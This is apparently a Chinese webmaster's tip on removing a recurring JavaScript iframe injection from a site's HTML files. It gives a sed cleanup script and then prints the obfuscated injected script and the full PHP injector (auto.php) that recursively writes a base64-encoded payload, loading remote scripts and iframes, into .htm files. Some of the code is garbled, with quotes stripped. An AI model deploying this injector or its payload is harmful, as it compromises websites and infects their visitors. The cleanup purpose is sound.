小知识：用shell命令删除网站最新nb挂马的方法与代码

复制代码 代码如下:

#

# if(document.cookie.indexOf(helio)==-1){var expires=new Date();expires.setTime(expires.getTime()+1*60*60*1000);document.cookie=helio=Yes;path=/;expires=+expires.toGMTString()

# eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\\w+};c=1};while(c–)if(k[c])p=p.replace(new RegExp(\\b+e(c)+\\b,g),k[c]);return p}(5.l(\<9 7=0 k=1 i=”8://m.n.6.4/a/e.c?2″> <9 7=0 k=1 i=”8://m.n.6.4/a/g.c?3″> \),62,24,|100|YNE|ZGH|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc.split(|),0,{}));} ?:e(parseint(c>

# </script>

确实很让人头痛，还是编写shell 脚本把这些脚本去掉

复制代码 代码如下:

#!/bin/sh

ls $1/*.htm | while read file

do

sed -i -e “/if(document.cookie.indexOf(helio/d; /eval(function(p,a,c,k,e,d)/d;” $file

done

但是第二天还是有

最后偶然发现 网站中有个auto.php 文件比较可疑

查看下内容，果然是木马的根源

下面是其内容，希望对大家有所帮助

复制代码 代码如下:

error_reporting(E_ERROR);

set_time_limit(0);

function CheckPath($path)

{

return str_replace(//,/,str_replace(\\,/,$path));

}

function AutoRead($filename)

{

$handle = @fopen($filename,”rb”);

$filecode = @fread($handle,@filesize($filename));

@fclose($handle);

return $filecode;

}

function AutoWrite($filename, $filecode ,$filemode)

{

$time = @filemtime($filename);

$handle = @fopen($filename,$filemode);

$key = @fwrite($handle,”\r\n”.$filecode.”\r\n”);

if(!$key)

{

@chmod($filename,0666);

$key = @fwrite($handle,”\r\n”.$filecode.”\r\n”);

}

@fclose($handle);

@touch($filename,$time);

return $key ? true : false;

}

function make_pass($length)

{

$possible = “ABCDEFGHIJKLMNOPQRSTUVWXYZ”;

$str = “”;

while(strlen($str) < $length)

{

$str .= substr($possible,(rand() % strlen($possible)),1);

}

return $str;

}

function AutoRun($dir)

{

$spider = @opendir($dir);

while($file = @readdir($spider))

{

if($file == . || $file == .. || $file == a || $file == images || $file == uploads || $file == special || $file == data || $file == include || $file == member || $file == templets || $file == install) continue;

$code = base64_decode(PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCmlmKGRvY3VtZW50LmNvb2tpZS5pbmRleE9mKCdoZWxpbycpPT0tMSl7dmFyIGV4cGlyZXM9bmV3IERhdGUoKTtleHBpcmVzLnNldFRpbWUoZXhwaXJlcy5nZXRUaW1lKCkrMSo2MCo2MCoxMDAwKTtkb2N1bWVudC5jb29raWU9J2hlbGlvPVllcztwYXRoPS87ZXhwaXJlcz0nK2V4cGlyZXMudG9HTVRTdHJpbmcoKQ0KZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKWRbZShjKV09a1tjXXx8ZShjKTtrPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKWlmKGtbY10pcD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSk7cmV0dXJuIHB9KCc1LmwoXCc8aCBmPWIgaT04Oi8vbS5uLjYuNC9hL2ouZD48L2g+PDkgNz0wIGs9MSBpPSI4Oi8vbS5uLjYuNC9hL2UuYz8yIj48Lzk+PDkgNz0wIGs9MSBpPSI4Oi8vbS5uLjYuNC9hL2cuYz8zIj48Lzk+XCcpJyw2MiwyNCwnfDEwMHw=);

$code .= make_pass(3);

$code .= |;

$code .= make_pass(3);

$code .= base64_decode(fGNufGRvY3VtZW50fGdvdnxoZWlnaHR8aHR0cHxpZnJhbWV8aW1hZ2VzfGphdmFzY3JpcHR8anBnfGpzfGtpc3N8bGFuZ3VhZ2V8bWlzc3xzY3JpcHR8c3JjfHViYnx3aWR0aHx3cml0ZWxufHd3d3x4Y3JzcmMnLnNwbGl0KCd8JyksMCx7fSkpO30NCjwvc2NyaXB0Pg0KPC9oZWFkPg==);

die($code);

$filename = CheckPath($dir./.$file);

if(is_dir($filename)) AutoRun($filename);

if(eregi(\.htm|\.shtml,$file))

{

$checkcode = AutoRead($filename);

if((!stristr($checkcode,eval(function()) && stristr($checkcode,))

{

$newcode = str_replace(,$code,$checkcode);

echo AutoWrite($filename, $newcode, “wb”) ? “ok:”.$filename.”\n” : “err:”.$filename.”\n”;

ob_flush();

flush();

}

}

$checkcode = NULL;

$newcode = NULL;

}

@closedir($spider);

return true;

}

if(isset($_GET[dir]))

{

AutoRun($_GET[dir]);

}

echo http://.$_SERVER[SERVER_NAME].$_SERVER[PHP_SELF].?dir=.CheckPath(dirname(__FILE__));

?>